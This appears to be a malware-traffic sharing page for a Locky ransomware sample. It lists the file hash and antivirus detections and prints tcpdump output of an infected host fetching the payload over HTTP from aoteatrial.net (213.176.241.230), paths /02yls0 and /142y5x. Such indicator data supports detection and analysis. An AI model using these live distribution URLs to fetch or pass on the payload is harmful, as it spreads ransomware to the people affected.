Locky Ransomware Malware aoteatrial.net/02yls0 PCAP file download traffic sample

Download Attachments

  • 1 pcap locky
    Date added: October 29, 2016 8:00 am Added by: admin File size: 17 KB Downloads: 308
SHA256: 9081ecf001a89fb1fa6f2855c6385d43fd473d69de0e58ed9b9e7e23ac954aff
File name: 02yls0
Detection ratio: 33 / 56
Analysis date: 2016-10-29 07:47:22 UTC ( 0 minutes ago )
Arcabit Trojan.Agent.CAHB 20161029
Avast Win32:Malware-gen 20161029
Avira (no cloud) TR/Crypt.ZPACK.elnee 20161028
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9942 20161029
BitDefender Trojan.Agent.CAHB 20161029
Bkav HW32.Packed.AE7D 20161029
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
Cyren W32/Locky.BC.gen!Eldorado 20161029
ESET-NOD32 a variant of Win32/Kryptik.FIQB 20161029
Emsisoft Trojan.Agent.CAHB (B) 20161029
F-Prot W32/Locky.BC.gen!Eldorado 20161029
F-Secure Trojan.Agent.CAHB 20161029
Fortinet W32/Generic.FIQB!tr 20161029
GData Trojan.Agent.CAHB 20161029
Invincea ransom.win32.locky.a 20161018
K7AntiVirus Trojan ( 004fbad41 ) 20161029
K7GW Trojan ( 004fbad41 ) 20161029
Kaspersky HEUR:Trojan.Win32.Generic 20161029
Malwarebytes Ransom.Locky 20161029

2016-10-29 02:50:44.243416 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [P.], seq 0:283, ack 1, win 256, length 283: HTTP: GET /02yls0 HTTP/1.1
E..CXK@……..f…….PO…d…P….N..GET /02yls0 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoteatrial.net
Connection: Keep-Alive
2016-10-29 02:50:45.116064 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [.], ack 2921, win 256, length 0
E..(XL@……..f…….PO…d..-P………….

E..(.!@……..fhp.S…P.}…..<P…<………
2016-10-29 02:50:52.686092 IP 192.168.1.102.64954 > 104.112.255.83.80: Flags [P.], seq 0:262, ack 1, win 256, length 262: HTTP: GET /fwlink/?LinkId=57426&Mime=application/x-msdownload HTTP/1.1
E….”@……..fhp.S…P.}…..<P…^…GET /fwlink/?LinkId=57426&Mime=application/x-msdownload HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Connection: Keep-Alive
2016-10-29 02:50:52.765557 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [.], ack 247008, win 252, length 0
E..(X.@….~…f…….PO…d.m.P………….

E..(X.@….z…f…….P.4.Q…aP…}9……..
2016-10-29 02:50:57.973364 IP 192.168.1.102.64957 > 213.176.241.230.80: Flags [P.], seq 0:392, ack 1, win 256, length 392: HTTP: GET /02yls0 HTTP/1.1
E…X.@……..f…….P.4.Q…aP….X..GET /02yls0 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=245702-
Unless-Modified-Since: Fri, 28 Oct 2016 07:32:48 GMT
If-Range: “3c400-53fe7dd719b7b”
Host: aoteatrial.net
Connection: Keep-Alive


E..(..@…D=…f6……….dz.fJP…%………
2016-10-29 02:51:33.922947 IP 192.168.1.102.64957 > 213.176.241.230.80: Flags [P.], seq 392:675, ack 1360, win 251, length 283: HTTP: GET /142y5x HTTP/1.1
E..CX.@….\…f…….P.4……P…….GET /142y5x HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoteatrial.net
Connection: Keep-Alive

 

 

Leave a Reply